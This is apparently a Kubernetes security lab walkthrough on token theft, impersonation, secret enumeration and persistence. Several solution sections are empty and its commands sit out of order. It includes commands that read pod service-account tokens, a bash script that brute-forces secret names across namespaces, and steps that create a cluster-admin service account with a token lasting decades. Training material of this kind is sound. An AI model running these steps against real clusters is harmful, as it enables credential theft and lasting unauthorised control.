Tokens are usually found at "/run/secrets/kubernetes.io/serviceaccount/token" and are readable by all users.
Solution
id # observe we are not root
ls -la /run/secrets/kubernetes.io/serviceaccount/token
ls -la /run/secrets/kubernetes.io/serviceaccount/..data/token # Can still read token
cat /run/secrets/kubernetes.io/serviceaccount/token
Ok we have the token, but how can we use it from inside the pod itself?
Hint
Find a way to import the "kubectl" tool in the Pod.
Solution
Run the following command on a node:
cp /usr/bin/kubectl .
python3 -m http.server
ip a # find ip of node
Enter tiller pod again:
Run the following commands in the pod:
Note: Replace <IP> with a valid IP where the python server is listening.
2. Impersonating Privileged Accounts
Let's create a user that has access to the "impersonate" verb and see how it can be used.
Solution
Create service account "impersonator":
Let's use the "impersonator" token with kubectl and:
Create token for "impersonator" SA and use it in kubectl:
Impersonate the "masters" group and a non-existent user:
Impersonate the "tiller" service account in the "kube-system" namespace:
Optional: Put the Kubernetes config which was moved from "/.kube/config" to "/.kube/config.bak" back to it's previous location:
3. List & Get Secrets
Let's create 2 service accounts:
One has the privilege of listing all secrets in k8s
The other has get access on the secrets and list access on the pods and serviceaccounts APIs
Solution
Create service account "list-sec":
Create service account "read-sec":
Let's use the "list-sec" account to list and read all secrets.
Solution
Let's use the "read-sec" account to read the "default" secret.
Although the "read-sec" account can read any secret, we need to know the name of the secret we are trying to read. Let's write a bash/python/etc. script and a set of wordlists to bruteforce the available secrets.
Solution
We can use the list pods and list SAs to gain potential sensitive information for our wordlists:
Bash script "bruteforce_secret.sh":
Example command:
Read some of the identified secrets:
Optional: Put the Kubernetes config which was moved from "/.kube/config" to "/.kube/config.bak" back to it's previous location:
4. Create Service Accounts Tokens
Let's create an administrative service account and generate a token that will last for years (>=10 years).
Hint
K8s instances have by default the "cluster-admin" cluster role.
kubectl --token=$RTOKEN -s https://localhost:6443 --insecure-skip-tls-verify=true get pods -A
kubectl --token=$RTOKEN -s https://localhost:6443 --insecure-skip-tls-verify=true get sa -A
#!/bin/bash
if [[ $# -ne 4 ]]; then
echo -e "\n\tUSAGE: $0 <http(s)://TARGET:PORT> <TOKEN> <NAMESPACE_FILE> <SECRET_FILE>\n"
exit
fi
TARGET=$1
TOKEN=$2
NAMESPACE_FILE=$3
SECRET_FILE=$4
result=""
for i in `cat $3`; do
for j in `cat $4`; do
echo "Trying: $i - $j"
x=$(./kubectl --token=$TOKEN -s $TARGET --insecure-skip-tls-verify=true get secret "$j" -n "$i" 2>/dev/null)
if [[ "$x" != "" ]]; then
result="$result\nFound: $i - $j \n$x\n"
fi
done
done
echo -e "\n\nResults:\n$result"
kubectl create sa mal
kubectl create clusterrolebinding mal_sa --clusterrole=cluster-admin --serviceaccount=default:mal
kubectl create token mal --duration=999999999s